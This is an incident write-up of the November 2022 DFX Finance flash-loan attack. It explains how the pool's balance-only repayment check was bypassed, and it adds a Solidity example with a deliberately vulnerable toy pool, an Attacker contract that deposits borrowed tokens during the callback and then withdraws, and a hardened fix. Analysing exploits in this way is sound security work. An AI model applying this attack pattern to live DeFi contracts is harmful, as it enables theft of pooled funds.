
DFX Finance Smart Contract Vulnerability Explained

Cointime Official

by Shashank

Overview:

On 11 November 2022, a re-entrancy attack drained roughly $7.5M from DFX Finance's liquidity pools on Ethereum (block 15941904). The attacker managed to move only about $4.3M of that into their own wallet; the remaining ~$3.2M was taken by an MEV bot that copied and front-ran the exploit transaction.

Smart Contract Hack Overview:

  • Attacker’s address: 0x14c1
  • DFX Finance Code: 0x8888
  • MEV Bot Address & transaction: 0x6c6b
  • MEV Bot’s wallet address: 0xfde
  • Block containing the unusually ordered transactions (MEV bot ahead of the attacker): 15941904
  • MEV Bot & wallet transaction address analysis: 0xfde0d

GitHub code link:

Decoding the Smart Contract Vulnerability:

[Figure: series of transactions connected to the attacker's wallet and the MEV bot]
  • The flash loan's repayment check only compared the pool contract's token balance before and after the borrower's callback; it did not track where the returned tokens came from. Because the attacker deposited the borrowed tokens back into the same pool as liquidity during the callback, the balance was restored and the check passed even though the loan was never actually repaid.
  • The re-entrancy guard on withdraw() did not help. The attacker never re-entered withdraw() while the loan was open; they called it after flash() had returned, when the guard saw an ordinary call. By then the LP tokens minted for the deposit made inside the callback were already held by the attacker, so they could call withdraw()/emergencyWithdraw() repeatedly until all of the deposited liquidity had been redeemed for the underlying tokens.
  • Because MEV bots were active, a bot operator captured a large share of the proceeds, and the attacker ended up with only about $4M of the stolen funds.
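The interaction described above, as an added example that is not DFX Finance's contract: a stripped-down single-token pool whose flash() checks only that its own balance was restored, and whose re-entrancy lock covers withdraw() alone, which is the configuration the article describes. The `hardened` flag is this example's own mitigation: it extends the same lock to flash() and deposit(), so the deposit made inside the callback reverts with "reentrant" and the whole attack transaction fails. All names here (ToyPool, Attacker, onFlash, shares), the 1:1 share pricing and the missing flash fee are simplifications assumed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added example, not DFX Finance's code. Models the flash()/deposit()/withdraw()
// sequence from the article. Names, 1:1 share pricing and the absence of a
// flash fee are assumptions made for illustration.

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IFlashCallback {
    function onFlash(uint256 amount, bytes calldata data) external;
}

contract ToyPool {
    IERC20 public immutable token;
    // false: the lock guards withdraw() only (the article's configuration)
    // true:  the lock also guards flash() and deposit() (this example's fix)
    bool public immutable hardened;
    mapping(address => uint256) public shares; // LP shares, priced 1:1 with tokens
    bool private locked;

    constructor(IERC20 _token, bool _hardened) {
        token = _token;
        hardened = _hardened;
    }

    function _acquire() internal {
        require(!locked, "reentrant");
        locked = true;
    }

    function _release() internal {
        locked = false;
    }

    // Lends `amount`, hands control to the borrower, then checks only that the
    // pool's balance is back where it started. It does not track how.
    function flash(uint256 amount, bytes calldata data) external {
        if (hardened) _acquire();
        uint256 before = token.balanceOf(address(this));
        require(token.transfer(msg.sender, amount), "transfer failed");
        IFlashCallback(msg.sender).onFlash(amount, data);
        require(token.balanceOf(address(this)) >= before, "flash not repaid");
        if (hardened) _release();
    }

    // Unguarded in the vulnerable configuration, so it can be called while a
    // flash loan is open: the borrowed tokens come back as a deposit that mints shares.
    function deposit(uint256 amount) external {
        if (hardened) _acquire();
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        shares[msg.sender] += amount;
        if (hardened) _release();
    }

    // Guarded in both configurations, but the guard only stops re-entry, and a
    // call made after flash() has returned is not re-entry.
    function withdraw(uint256 amount) external {
        _acquire();
        shares[msg.sender] -= amount; // reverts on underflow in 0.8
        require(token.transfer(msg.sender, amount), "transfer failed");
        _release();
    }
}

contract Attacker is IFlashCallback {
    ToyPool public immutable pool;
    IERC20 public immutable token;

    constructor(ToyPool _pool) {
        pool = _pool;
        token = _pool.token();
    }

    // Step 1: borrow. Step 3, after flash() returns: redeem the shares minted in step 2.
    // Against the vulnerable pool this contract ends up holding `amount` tokens it
    // never owned; against the hardened pool the deposit in onFlash reverts.
    function attack(uint256 amount) external {
        pool.flash(amount, "");
        pool.withdraw(amount);
    }

    // Step 2: inside the callback, deposit the borrowed tokens as liquidity so the
    // pool's balance check passes while this contract keeps the LP shares.
    function onFlash(uint256 amount, bytes calldata) external override {
        require(msg.sender == address(pool), "not pool");
        require(token.approve(address(pool), amount), "approve failed");
        pool.deposit(amount);
    }
}
```

The point of the `hardened` variant is that a single mutex shared by every state-changing entry point turns the deposit-during-callback into a genuine re-entry that the guard can see; a guard on withdraw() alone checks the wrong function at the wrong time. An alternative fix with the same effect is to make flash() account for repayment explicitly (for example, requiring the borrower to transfer the principal plus fee back via transferFrom) instead of inferring it from the pool's balance.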